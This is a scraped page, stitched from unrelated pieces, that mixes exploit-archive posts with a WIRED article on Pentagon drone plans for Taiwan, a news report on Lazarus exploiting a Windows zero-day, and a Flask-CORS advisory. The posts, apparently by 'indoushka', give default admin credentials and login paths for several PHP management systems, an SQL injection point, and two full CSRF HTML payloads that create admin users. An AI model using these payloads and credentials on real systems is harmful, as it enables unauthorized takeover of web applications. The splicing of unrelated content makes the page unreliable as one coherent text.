JobSeeker CMS version 1.5 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : JobSeeker CMS 1.5 Insecure Settings Vulnerability                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                   || # Vendor    : https://demo.phpscriptpoint.com/jobseeker/                                                                         |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin@gmail.com & pass = 1234[+] https://www/127.0.0.1/demo/phpscriptpointcom/jobseeker/adminGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

JobSeeker CMS 1.5 Insecure Settings

Jobs Finder System version 1.0 suffers from a remote SQL injection vulnerability.

**Jobs Finder System 1.0 SQL Injection**

Posted Aug 19, 2024

Authored by indoushka

Jobs Finder System version 1.0 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection

SHA-256 | 0e14944aabacd3bde55dc9ca768a85b25224b5d197aed3ef9cecb63e14d97575

Download | Favorite | View

**Jobs Finder System 1.0 SQL Injection**

    =============================================================================================================================================| # Title     : jobs Finder System v1.0 SQL injection Vulnerability                                                                         || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://download-media.code-projects.org/2020/04/Jobs_Finder_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip             |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /jobs.php?id=3 <=== inject here[+] http://127.0.0.1/jobportal-master/jobs.php?id=3 [+]  Login : http://127.0.0.1/jobportal-master/login.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,460)
*   Arbitrary (16,885)
*   BBS (2,859)
*   Bypass (1,867)
*   CGI (1,033)
*   Code Execution (7,823)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,398)
*   DoS (25,094)
*   Encryption (2,389)
*   Exploit (53,232)
*   File Inclusion (4,263)
*   File Upload (996)
*   Firewall (822)
*   Info Disclosure (2,891)
*   Intrusion Detection (916)
*   Java (3,144)
*   JavaScript (898)
*   Kernel (7,223)
*   Local (14,799)
*   Magazine (586)
*   Overflow (13,172)
*   Perl (1,435)
*   PHP (5,225)
*   Proof of Concept (2,394)
*   Protocol (3,727)
*   Python (1,646)
*   Remote (31,673)
*   Root (3,638)
*   Rootkit (527)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,029)
*   Shell (3,277)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,278)
*   SQL Injection (16,614)
*   TCP (2,441)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (33,004)
*   Web (9,968)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,259)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,101)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,815)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,569)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,756)
*   UNIX (9,438)
*   UnixWare (187)
*   Windows (6,674)
*   Other

Jobs Finder System 1.0 SQL Injection

Human Resource Management System 2024 version 1.0 suffers from an ignored default credential vulnerability.

**Human Resource Management System 2024 1.0 Insecure Settings**

Posted Aug 19, 2024

Authored by indoushka

Human Resource Management System 2024 version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | bf20205d0167adcb0c48749ed7a50372cba24a18938ecfb734926b5099542af1

Download | Favorite | View

**Human Resource Management System 2024 1.0 Insecure Settings**

    =============================================================================================================================================| # Title     : Human Resource Management System 2024 v1.0 Insecure Settings Vulnerability                                                  || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin@gmail.com & pass = admin#123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,460)
*   Arbitrary (16,885)
*   BBS (2,859)
*   Bypass (1,867)
*   CGI (1,033)
*   Code Execution (7,823)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,398)
*   DoS (25,094)
*   Encryption (2,389)
*   Exploit (53,232)
*   File Inclusion (4,263)
*   File Upload (996)
*   Firewall (822)
*   Info Disclosure (2,891)
*   Intrusion Detection (916)
*   Java (3,144)
*   JavaScript (898)
*   Kernel (7,223)
*   Local (14,799)
*   Magazine (586)
*   Overflow (13,172)
*   Perl (1,435)
*   PHP (5,225)
*   Proof of Concept (2,394)
*   Protocol (3,727)
*   Python (1,646)
*   Remote (31,673)
*   Root (3,638)
*   Rootkit (527)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,029)
*   Shell (3,277)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,278)
*   SQL Injection (16,614)
*   TCP (2,441)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (33,004)
*   Web (9,968)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,259)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,101)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,815)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,569)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,756)
*   UNIX (9,438)
*   UnixWare (187)
*   Windows (6,674)
*   Other

Human Resource Management System 2024 1.0 Insecure Settings

Hotel Management System version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : Hotel Management System 1.0 CSRF Vulnerability                                                                              |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/hotel-management-system-using-php.zip                 |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

  [+] Line 27 : Set your target url

[+] save payload as poc.html 

[+] payload : 

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>User Registration</title>  
</head>  
<body>

    <h2>User Registration</h2>  
    <form id="userForm" enctype="multipart/form-data">  
        <label for="username">User Name:</label>  
        <input type="username" id="username" name="username" required><br><br>

        <label for="password">Password:</label>  
        <input type="password" id="password" name="password" required><br><br>

        <input type="button" value="Save User" onclick="saveUser()">  
    </form>

    <script>  
        function saveUser() {  
            var form = document.getElementById('userForm');  
            var formData = new FormData(form);

            var xhr = new XMLHttpRequest();  
            xhr.open("POST", "http://127.0.0.1/hotel/admin/ajax.php?action=save_user", true);

            xhr.onload = function () {  
                if (xhr.status === 200) {  
                    alert('User saved successfully');  
                } else {  
                    alert('An error occurred while saving the user');  
                }  
            };

            xhr.send(formData);  
        }  
    </script>

</body>  
</html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Hotel Management System 1.0 Cross Site Request Forgery

Bhojon Restaurant Management System version 3.0 suffers from an ignored default credential vulnerability.

**Bhojon Restaurant Management System 3.0 Insecure Settings**

Posted Aug 19, 2024

Authored by indoushka

Bhojon Restaurant Management System version 3.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 5040244ae54e0b0c8ba29ab2d3b854826d64f8640404907653ffda5ea3f38ca6

Download | Favorite | View

**Bhojon Restaurant Management System 3.0 Insecure Settings**

    ====================================================================================================================================| # Title     : Bhojon restaurant management system v3.0 Insecure Settings Vulnerability                                           || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://www.bdtask.com/restaurant-management-system.php#live_demo                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin@example.com & pass = 12345[+] https://www/127.0.0.1/gixrestaurantmy/dashboard/autoupdateGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,460)
*   Arbitrary (16,885)
*   BBS (2,859)
*   Bypass (1,867)
*   CGI (1,033)
*   Code Execution (7,823)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,398)
*   DoS (25,094)
*   Encryption (2,389)
*   Exploit (53,232)
*   File Inclusion (4,263)
*   File Upload (996)
*   Firewall (822)
*   Info Disclosure (2,891)
*   Intrusion Detection (916)
*   Java (3,144)
*   JavaScript (898)
*   Kernel (7,223)
*   Local (14,799)
*   Magazine (586)
*   Overflow (13,172)
*   Perl (1,435)
*   PHP (5,225)
*   Proof of Concept (2,394)
*   Protocol (3,727)
*   Python (1,646)
*   Remote (31,673)
*   Root (3,638)
*   Rootkit (527)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,029)
*   Shell (3,277)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,278)
*   SQL Injection (16,614)
*   TCP (2,441)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (33,004)
*   Web (9,968)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,259)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,101)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,815)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,569)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,756)
*   UNIX (9,438)
*   UnixWare (187)
*   Windows (6,674)
*   Other

Bhojon Restaurant Management System 3.0 Insecure Settings

Accounting Journal Management System version 1.0 suffers from a cross site request forgery vulnerability.

    =============================================================================================================================================| # Title     : Accounting Journal Management System 1.0 CSRF Vulnerability                                                                 || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/hotel-management-system-using-php.zip                 |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.  [+] Line 6 : Set your target url[+] Line 15 + 19 : Set user & pass[+] save payload as poc.html [+] payload : <!DOCTYPE html> <html> <body> <script> function submitRequest()  { var xhr = new XMLHttpRequest();  xhr.open("POST", "http://127.0.0.1/ajms/classes/Users.php?f=save", true); xhr.setRequestHeader("Accept", "*\/*");  xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------"); xhr.withCredentials = true;  var body = "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"username\"\r\n" +  "\r\n" +  "indoushka\r\n" +  "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"password\"\r\n" +  "\r\n" +  "Hacked\r\n" +  "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"type\"\r\n" +  "\r\n" +  "1\r\n" +  "-------------------------------\r\n";  var aBody = new Uint8Array(body.length);  for (var i = 0; i < aBody.length; i++)  aBody[i] = body.charCodeAt(i);  xhr.send(new Blob([aBody]));  } </script> <form action="#"> <input type="button" value="Submit request" onclick="submitRequest();" /> </form>  </body>  </html>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Accounting Journal Management System 1.0 Cross Site Request Forgery

An adversary could exploit these vulnerabilities by injecting malicious libraries into Microsoft's applications to gain their entitlements and user-granted permissions.

How multiple vulnerabilities in Microsoft apps for macOS pave the way to stealing permissions

The US Defense Department’s grand strategy for protecting Taiwan from a massive Chinese military offensive involves flooding the zone with thousands of drones.

It has become conventional wisdom among the halls of the United States government that China will launch a full-scale invasion of Taiwan within the next few years. And when that happens, the US military has a relatively straightforward response in mind: Unleash hell.

Speaking to The Washington Post on the sidelines of the International Institute for Strategic Studies’ annual Shangri-La Dialogue in June, US Indo-Pacific Command chief Navy Admiral Samuel Paparo colorfully described the US military’s contingency plan for a Chinese invasion of Taiwan as flooding the narrow Taiwan Strait between the two countries with swarms of thousands upon thousands of drones, by land, sea, and air, to delay a Chinese attack enough for the US and its allies to muster additional military assets in the region.

“I want to turn the Taiwan Strait into an unmanned hellscape using a number of classified capabilities,” Paparo said, “so that I can make their lives utterly miserable for a month, which buys me the time for the rest of everything.”

Cheap, easily weaponizable drones have transformed battlefields from Ukraine to the Middle East in recent years, and the US military is rapidly adapting to this new uncrewed future. While Paparo isn’t the first to invoke the image of a robotic “hellscape” with regards to Taiwan (his predecessor, Admiral John Aquilino had previously used the term in August 2023), his comments offer the most vivid description of the Defense Department’s plan for dealing with Chinese aggression toward the US ally. In recent months, new details have started to draw out the contours of what, exactly, this “hellscape” would look like.

**A Great Wall of Drones**

China has undertaken a major military buildup ahead of what American defense leaders see as an imminent attempt to annex Taiwan, which Beijing sees as a breakaway province. According to a June analysis from the Center for Strategic & International Studies, the People’s Liberation Army Navy now boasts the largest maritime force on the planet, with 234 warships to the US Navy’s fleet of 219; testifying before the Senate Armed Services Committee in March, then-INDOPACOM boss Aquilino stated that the PLA Air Force also now has the largest number of warplanes in the region (not counting uncrewed systems), with designs on soon surpassing the US and Russian air fleets.

While the exact size of the Chinese military’s arsenal of uncrewed vehicles is difficult to estimate, the country has become the leading exporter of armed combat drones around the world over the past decade (along with Turkey), according to data from the Stockholm International Peace Research Institute. And when it comes to the consumer drones that are converted into weapons of war by soldiers on the front lines, Chinese drone giant Da-Jiang Innovations (better known in the US as DJI) controls three-quarters of that market, according to The Wall Street Journal. While the US and China may appear locked in an military drone arms race, the latter currently possess a significant advantage.

“China has essentially copied all of the large and medium high-altitude drones the US has and produced what amount to cheaper versions of the MQ-9 Reaper or the \[RQ-4\] Global Hawk,” Stacie Pettyjohn tells WIRED. A senior fellow and director of defense programs at the Center for a New American Security, Pettyjohn is the lead author of the June report “Swarms Over the Strait” on the role of drones in a future conflict over Taiwan. “Potentially more concerning is the smaller drones that don’t have to fly as far and can be launched from mainland China, of which the Chinese military has many.”

Simply put, China has a lot of drones and can make a lot more drones quickly, creating a likely advantage during a protracted conflict. “This stands in contrast to American and Taiwanese forces, who do not have large inventories of drones or the right mix of drones to successfully defeat a Chinese invasion,” Pettyjohn and her coauthors write in the CNAS report.

Apart from beefing up Taiwan’s counter-drone defenses, the Pentagon’s “hellscape” plan proposes that the US military make up for this growing gap by producing and deploying what amounts to a massive screen of autonomous drone swarms designed to confound enemy aircraft, provide guidance and targeting to allied missiles, knock out surface warships and landing craft, and generally create enough chaos to blunt (if not fully halt) a Chinese push across the Taiwan Strait. Networked drones will not just strike adversaries but also provide critical intelligence, surveillance, and reconnaissance functions to fill the gaps between satellite imaging and crewed overflights, ostensibly allowing the US and its allies to develop a more complete picture of the battlefield as it evolves.

“A 2020 Rand Corporation report concludes that hundreds of networked, low-cost drones could guide American long-range anti-ship missiles toward a Chinese invasion fleet and would be a key capability needed to defeat China and successfully defend Taiwan,” the CNAS report says. “Similarly, proponents of air denial strategy argue that using ‘sufficiently large numbers of smaller, cheaper weapons,’ including ground-based air defenses and drone swarms, ‘in a distributed way’ would prevent China from gaining air superiority.”

As Pettyjohn points out to WIRED, the concept of Taiwan using densely layered defenses to inflict incredibly high losses on an invading Chinese force isn’t new, with past visions of a “porcupine strategy” built on missiles and mines as deterrents to an outright invasion. But the incorporation of massive drone fleets adds a new layer to the fight. Indeed, war games conducted by the US Air Force and defense think tanks like Rand over the past several years have pointed to the critical role drone swarms could play in potentially thwarting an invasion of Taiwan.

According to the CNAS report, this strategy appears to have been sharpened by recent lessons from Russia’s invasion of Ukraine, where the Ukrainian military has successfully deployed drones against the superiorly numbered and equipped Russian force to disrupt enemy formations, destroy armored vehicles, and even neutralize surface combatants. Look no further than the Black Sea, where Ukrainian forces have managed to destroy 26 Russian vessels and forced Moscow’s vaunted Black Sea Fleet to a safe harbor hundreds of miles away using missiles, kamikaze UAVs, and explosive-laden drone boats.

The CNAS report makes several recommendations for how the Pentagon can best employ drones to defend Taiwan, emphasizing the need to build a “diverse” fleet of UAVs encompassing “a mix of higher-end and cheaper systems” (the large and expensive Reaper versus low-cost single-use kamikaze drones, for example), investing in the development of autonomous drone boats for attacking larger surface warships, and pre-positioning short- and medium-range drones on Taiwan for a rapid, immediate response to a Chinese invasion.

“In addition to acquiring ‘good enough’ long-range drones for target acquisition and strike, the United States should have a smaller number of stealthy drones that can conduct surveillance in highly contested airspace and provide targeting information for standoff missile strikes,” the report says, adding that “affordable kamikaze drones with relatively simple autonomy could overwhelm the Chinese navy’s air defenses and damage or destroy the invasion fleet.”

**Engage the Replicator**

With a potential invasion looming, the Pentagon has kicked efforts to make its vision of a “hellscape” into high gear. Last August, deputy secretary of defense Kathleen Hicks announced the department’s new Replicator initiative, designed to build and field “attritable autonomous systems”—DOD-speak for disposable, AI-enabled drones—“at scale of multiple thousands, in multiple domains” within the next 18 to 24 months. As of March, the Pentagon had earmarked $1 billion across its fiscal-year 2024 and 2025 budgets for its first round of Replicator systems, as USNI News reported.

Replicator appears to be doing its job already. In May, the Pentagon announced its first tranche of fresh capabilities, which includes the accelerated fielding of more than 1,000 of defense contractor AeroVironment’s Switchblade-600 loitering munitions—a man-portable missile that circles over targets before dive-bombing them at the right moment—in the next year, as well as the procurement of uncrewed “interceptor” surface vessels under the department’s new Production-Ready, Inexpensive, Maritime Expeditionary (Prime) effort. According to a DOD solicitation released in January, the Prime drone boats will purportedly be capable of “autonomously transiting hundreds of miles through contested waterspace, loitering in an assigned operating area while monitoring for maritime surface threats, and then sprinting to interdict a noncooperative, maneuvering vessel.” The first Replicator systems were already deployed to the Indo-Pacific, according to Hicks, with some military units training with cheap drones produced under the initiative as of August.

"This is just the beginning," Admiral Christopher Grady, vice chairman of the Joint Chiefs of Staff, said in a May statement. "Replicator is helping us jump-start the delivery of critical capabilities at scale.

Replicator isn’t the US military’s only effort to incorporate uncrewed weapons platforms into its formations. The Army has asked for $120.6 million as part of its fiscal-year 2025 budget request for Low Altitude Stalking and Strike Ordnance (Lasso) semiautonomous loitering munitions to outfit infantry brigade combat teams with the capability. As of April, the Marine Corps has selected three defense contractors (AeroVironment, defense upstart Anduril, and Teledyne FLIR) to compete for a potential $249 million contract to furnish Marines with so-called Organic Precision Fires-Light kamikaze drone swarms (to say nothing of the Corps’ push to acquire Long Range Attack Missile air-launched loitering munition). US Special Operations Command, an early adopter of loitering munitions, now wants to outfit its fleet of aircraft with air-launched systems. And as for the maritime realm, the Marine Corps has been experimenting with uncrewed surface vessels bristling with Uvision Hero-120 kamikaze drone launchers, while the Navy has been eyeing missile-hauling drone boats as potential escorts for transport ships, among other lethal initiatives, after years of experimenting with uncrewed surface vessels as waterborne sensor nodes.

Beyond expanding its arsenal of uncrewed systems, the US is also working to bolster Taiwan’s own drone capabilities. In June, the State Department announced the approval of a $360 million weapons sale to Taipei that included 291 ALTIUS 600M-V kamikaze drones produced by Anduril and 720 Switchblade-300 loitering munitions. As the CNAS report notes, the integration of these one-way attack drones into Taiwanese military formations, when deployed in conjunction with explosive-laden drone boats and anti-ship missiles, could potentially prevent Chinese warships from ever reaching the country’s shores in a similar manner to how Ukrainian forces have denied the Russian military control over the Black Sea.

“Taiwan needs a lot of these systems and needs them quickly to incorporate them into broader tactics and formations” as effectively as the Ukrainians have, Pettyjohn says.

And this is just the beginning: The Taiwanese government plans to procure nearly 1,000 additional AI-enabled attack drones in the next year, according to Taipei Times, with long-standing plans to expand indigenous production of homegrown capabilities to prevent backlogs in weapons transfers from the United States—and, more importantly, ease reliance on Chinese-made commercial off-the-shelf parts. (Although, as Pettyjohn points out, the Taiwanese defense community itself isn’t totally unified around the “hellscape” plan in the first place.)

Access to commercial drones “is where Taiwan is most disadvantaged” because of DJI’s relative dominance of the market, Pettyjohn says, noting that “even if Taiwan had Chinese drones available to them, they would have to hack in to each system to ensure they can’t be tracked by DJI or don’t have similar vulnerabilities.”

“Consider that for most of the first-person-view kamikaze drones used in Ukraine right now, all of those components are sourced from China,” she adds. “Even Ukraine has tried to wean itself off Chinese sources and hasn’t found anything at a comparable price point.”

**Mass-Producing Hell**

Planning a “hellscape" of hundreds of thousands of drones is one thing, but actually making it a reality is another. An April 2023 assessment from the Rand Corporation indicated that rising demand for weaponized drones would likely “strain” the capacity of the existing US defense industrial base. Similarly, a separate CNAS report from June 2023 argued that the war in Ukraine (and the US government’s role as a major provider of security assistance to Kyiv) has “shed light on serious deficiencies” in the Pentagon’s ability to rapidly scale production of “key weapons” like precision-guided munitions compared to Russia—a problem echoed in the most recent CNAS report’s assessment of the US government’s approach to Taiwan’s defense.

“Ukraine consistently has pioneered new approaches to drone warfare, but Russia has rapidly adapted and scaled drone production in a way that Ukraine cannot match,” the June 2024 CNAS report says. “Technological and tactical innovations are necessary but not sufficient. Mass production of an affordable mix of drones is also needed to support a large and likely protracted conflict.”

The report adds that the US defense industrial based may not be “ currently capable of producing the quantities of drones needed for a war with China.”

Like Russia, China’s autocratic regime has enabled the country’s defense industrial base to rapidly accelerate weapons R&D and production, so far that Beijing is “heavily investing in munitions and acquiring high-end weapons systems and equipment five to six times faster than the United States,” as a March comparison from CSIS put it. By contrast, the US defense industrial ecosystem has over the past several decades consolidated into a handful of large “prime” contractors like Lockheed Martin and Raytheon, a development that threatens to not only stifle innovation but hamstring the production of critical systems needed for the next big war.

“Overall, the US defense industrial ecosystem lacks the capacity, responsiveness, flexibility, and surge capability to meet the US military’s production and war-fighting needs,” the CSIS report says. “Unless there are urgent changes, the United States risks weakening deterrence and undermining its war-fighting capabilities.”

To that end, the latest CNAS report recommends that the Pentagon and Congress work to foster both the commercial and military drone industrial base “to scale production and create surge capacity” to quickly replace drones lost in a future conflict. While the Pentagon has, with regards to Ukraine, relied on multi-year and large-lot procurement programs to source munitions from large “primes” and “\[provide\] industry with the stability it needs to expand production capacity,” as the 2023 CNAS report put it, the Replicator initiative is explicitly designed to not only further provide that stability to drone makers but also to pull in “nontraditional” defense industry players—startups like Anduril or drone boat maker Saronic, the latter of which recently received $175 million in Series B funding to scale up its manufacturing capacity.

Replicator “provides the commercial sector with a demand signal that allows companies to make investments in building capacity, strengthening both the supply chain and the industrial base,” according to the Defense Innovation Unit, the Pentagon organ responsible for capitalizing on emerging commercial technologies. “Replicator investments incentivize traditional and non-traditional industry players to deliver record volumes of all domain attritable autonomous systems in line with the ambitious schedule set forth by the deputy secretary of defense.”

“It comes down to contracts,” Pettyjohn says. “Where Replicator is potentially most impactful is where the Pentagon buys something they keep for a few years before they get something new for a different mission set so the DOD isn’t keeping a system in their inventory for decades. Establishing those practices, getting those contracts out there, and getting enough money into it so there’s competition and resiliency within industry is really needed to fuel innovation and provide the capabilities that are needed.”

It’s unclear whether the United States will actually be ready to defend Taiwan when the moment arrives; as legendary Prussian military commander Helmuth von Moltke is famously quoted as saying, “no plan survives first contact with the enemy.” But with the right preparation, funding, and training (and a little luck), the Pentagon and its Taiwanese partners may end up successfully throwing a wrench in China’s suspected invasion plans by flooding the zone with lethal drones. War is hell, but when the next big conflict in the Indo-Pacific rolls around, the US wants to guarantee that it will be an absolute hellscape—for the Chinese military, at least.

The Pentagon Is Planning a Drone ‘Hellscape’ to Defend Taiwan

A newly patched security flaw in Microsoft Windows was exploited as a zero-day by Lazarus Group, a prolific state-sponsored actor affiliated with North Korea.
The security vulnerability, tracked as CVE-2024-38193 (CVSS score: 7.8), has been described as a privilege escalation bug in the Windows Ancillary Function Driver (AFD.sys) for WinSock.
"An attacker who successfully exploited this

A newly patched security flaw in Microsoft Windows was exploited as a zero-day by Lazarus Group, a prolific state-sponsored actor affiliated with North Korea.

The security vulnerability, tracked as **CVE-2024-38193** (CVSS score: 7.8), has been described as a privilege escalation bug in the Windows Ancillary Function Driver (AFD.sys) for WinSock.

"An attacker who successfully exploited this vulnerability could gain SYSTEM privileges," Microsoft said in an advisory for the flaw last week. It was addressed by the tech giant as part of its monthly Patch Tuesday update.

Credited with discovering and reporting the flaw are Gen Digital researchers Luigino Camastra and Milánek. Gen Digital owns a number of security and utility software brands like Norton, Avast, Avira, AVG, ReputationDefender, and CCleaner.

"This flaw allowed them to gain unauthorized access to sensitive system areas," the company disclosed last week, adding it discovered the exploitation in early June 2024. "The vulnerability allowed attackers to bypass normal security restrictions and access sensitive system areas that most users and administrators can't reach."

The cybersecurity vendor further noted that the attacks were characterized by the use of a rootkit called FudModule in an attempt to evade detection.

While the exact technical details associated with the intrusions are presently unknown, the vulnerability is reminiscent of another privilege escalation that Microsoft fixed in February 2024 and was also weaponized by the Lazarus Group to drop FudModule.

Specifically, it entailed the exploitation of CVE-2024-21338 (CVSS score: 7.8), a Windows kernel privilege escalation flaw rooted in the AppLocker driver (appid.sys) that makes it possible to execute arbitrary code such that it sidesteps all security checks and runs the FudModule rootkit.

Both these attacks are notable because they go beyond a traditional Bring Your Own Vulnerable Driver (BYOVD) attack by taking advantage of a security flaw in a driver that's already installed on a Windows host as opposed to "bringing" a susceptible driver and using it to bypass security measures.

Previous attacks detailed by cybersecurity firm Avast revealed that the rootkit is delivered by means of a remote access trojan known as Kaolin RAT.

"FudModule is only loosely integrated into the rest of Lazarus' malware ecosystem," the Czech company said at the time, stating "Lazarus is very careful about using the rootkit, only deploying it on demand under the right circumstances."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft Patches Zero-Day Flaw Exploited by North Korea’s Lazarus Group

A vulnerability in corydolphin/flask-cors version 4.0.1 allows the `Access-Control-Allow-Private-Network` CORS header to be set to true by default, without any configuration option. This behavior can expose private network resources to unauthorized external access, leading to significant security risks such as data breaches, unauthorized access to sensitive information, and potential network intrusions.

**Flask-CORS allows the \`Access-Control-Allow-Private-Network\` CORS header to be set to true by default**

Moderate severity GitHub Reviewed Published Aug 18, 2024 to the GitHub Advisory Database • Updated Aug 19, 2024

Tag

#auth